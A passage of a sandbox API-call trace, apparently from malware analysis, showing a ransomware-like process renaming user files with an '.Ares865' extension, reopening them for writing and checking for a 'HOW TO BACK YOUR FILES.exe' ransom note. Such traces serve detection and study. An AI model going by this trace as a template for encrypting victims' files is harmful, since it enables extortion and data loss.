Cache\\6ASVN7J7\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\feeds cache\\6asvn7j7\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0099.595] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds Cache\\6ASVN7J7\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\feeds cache\\6asvn7j7\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.596] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=67) returned 1 [0099.600] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds Cache\\6ASVN7J7\\fwlink[1].Ares865") returned 93 [0099.600] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds Cache\\6ASVN7J7\\fwlink[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\feeds cache\\6asvn7j7\\fwlink[1]"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds Cache\\6ASVN7J7\\fwlink[1].Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\feeds cache\\6asvn7j7\\fwlink[1].ares865"), dwFlags=0x1) returned 1 [0099.601] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds Cache\\6ASVN7J7\\fwlink[1].Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\feeds cache\\6asvn7j7\\fwlink[1].ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.602] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=0) returned 1 [0099.602] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0099.602] CloseHandle (hObject=0x0) returned 0 [0099.602] CloseHandle (hObject=0x118) returned 1 [0099.602] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4dd1ee20, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4dd1ee20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0099.602] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0099.602] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4dd1ee20, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4dd1ee20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0099.602] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0099.602] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e79f0 [0099.602] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds Cache\\1NBUR4HR", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds Cache\\1NBUR4HR") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds Cache\\1NBUR4HR" [0099.603] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds Cache\\1NBUR4HR\\desktop.ini.Ares865") returned 95 [0099.603] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds Cache\\1NBUR4HR\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\feeds cache\\1nbur4hr\\desktop.ini"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds Cache\\1NBUR4HR\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\feeds cache\\1nbur4hr\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0099.605] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds Cache\\1NBUR4HR\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\feeds cache\\1nbur4hr\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.605] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=67) returned 1 [0099.611] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds Cache\\1NBUR4HR\\fwlink[1].Ares865") returned 93 [0099.611] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds Cache\\1NBUR4HR\\fwlink[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\feeds cache\\1nbur4hr\\fwlink[1]"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds Cache\\1NBUR4HR\\fwlink[1].Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\feeds cache\\1nbur4hr\\fwlink[1].ares865"), dwFlags=0x1) returned 1 [0099.613] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds Cache\\1NBUR4HR\\fwlink[1].Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\feeds cache\\1nbur4hr\\fwlink[1].ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.613] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=0) returned 1 [0099.613] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0099.613] CloseHandle (hObject=0x0) returned 0 [0099.613] CloseHandle (hObject=0x118) returned 1 [0099.613] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4dd1ee20, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4dd1ee20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0099.613] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0099.613] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4dd1ee20, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4dd1ee20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0099.613] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0099.614] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7790 [0099.614] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds" [0099.616] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms.Ares865") returned 90 [0099.616] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\feeds\\feedsstore.feedsdb-ms"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\feeds\\feedsstore.feedsdb-ms.ares865"), dwFlags=0x1) returned 1 [0099.617] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\feeds\\feedsstore.feedsdb-ms.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.618] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6656) returned 1 [0099.620] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" [0099.621] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" [0099.621] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Suggested Sites~.feed-ms.Ares865") returned 144 [0099.621] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Suggested Sites~.feed-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\suggested sites~.feed-ms"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Suggested Sites~.feed-ms.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\suggested sites~.feed-ms.ares865"), dwFlags=0x1) returned 1 [0099.635] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Suggested Sites~.feed-ms.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\suggested sites~.feed-ms.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.636] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=32768) returned 1 [0099.642] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms.Ares865") returned 146 [0099.642] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\web slice gallery~.feed-ms"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\web slice gallery~.feed-ms.ares865"), dwFlags=0x1) returned 1 [0099.644] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\web slice gallery~.feed-ms.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.644] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28672) returned 1 [0099.649] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds\\Microsoft Feeds~", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds\\Microsoft Feeds~") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds\\Microsoft Feeds~" [0099.650] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms.Ares865") returned 112 [0099.650] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\feeds\\microsoft feeds~\\microsoft at home~.feed-ms"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\feeds\\microsoft feeds~\\microsoft at home~.feed-ms.ares865"), dwFlags=0x1) returned 1 [0099.653] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\feeds\\microsoft feeds~\\microsoft at home~.feed-ms.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.654] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28672) returned 1 [0099.657] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms.Ares865") returned 112 [0099.658] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\feeds\\microsoft feeds~\\microsoft at work~.feed-ms"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\feeds\\microsoft feeds~\\microsoft at work~.feed-ms.ares865"), dwFlags=0x1) returned 1 [0099.660] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\feeds\\microsoft feeds~\\microsoft at work~.feed-ms.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.661] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28672) returned 1 [0099.669] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms.Ares865") returned 105 [0099.669] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\feeds\\microsoft feeds~\\msnbc news~.feed-ms"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\feeds\\microsoft feeds~\\msnbc news~.feed-ms.ares865"), dwFlags=0x1) returned 1 [0099.670] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\feeds\\microsoft feeds~\\msnbc news~.feed-ms.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.671] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28672) returned 1 [0099.682] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Event Viewer", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Event Viewer") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Event Viewer" [0099.683] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Credentials", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Credentials") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Credentials" [0099.683] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\History", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\History") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\History" [0099.685] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\History\\desktop.ini.Ares865") returned 72 [0099.685] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\History\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\history\\desktop.ini"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\History\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\history\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0099.686] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\History\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\history\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.687] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=145) returned 1 [0099.689] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\History\\Low", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\History\\Low") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\History\\Low" [0099.690] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\History\\Low\\desktop.ini.Ares865") returned 76 [0099.690] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\History\\Low\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\history\\low\\desktop.ini"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\History\\Low\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\history\\low\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0099.691] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\History\\Low\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\history\\low\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.691] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=145) returned 1 [0099.694] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\History\\Low\\History.IE5", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\History\\Low\\History.IE5") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\History\\Low\\History.IE5" [0099.695] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\History\\Low\\History.IE5\\desktop.ini.Ares865") returned 88 [0099.695] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\History\\Low\\History.IE5\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\history\\low\\history.ie5\\desktop.ini"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\History\\Low\\History.IE5\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\history\\low\\history.ie5\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0099.696] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\History\\Low\\History.IE5\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\history\\low\\history.ie5\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.697] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=145) returned 1 [0099.700] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\History\\Low\\History.IE5\\index.dat.Ares865") returned 86 [0099.700] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\History\\Low\\History.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\history\\low\\history.ie5\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\History\\Low\\History.IE5\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\history\\low\\history.ie5\\index.dat.ares865"), dwFlags=0x1) returned 1 [0099.703] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\History\\Low\\History.IE5\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\history\\low\\history.ie5\\index.dat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.704] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=32768) returned 1 [0099.710] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\History\\Low\\History.IE5\\MSHist012017071220170713", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\History\\Low\\History.IE5\\MSHist012017071220170713") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\History\\Low\\History.IE5\\MSHist012017071220170713" [0099.711] wsprintfW (in: 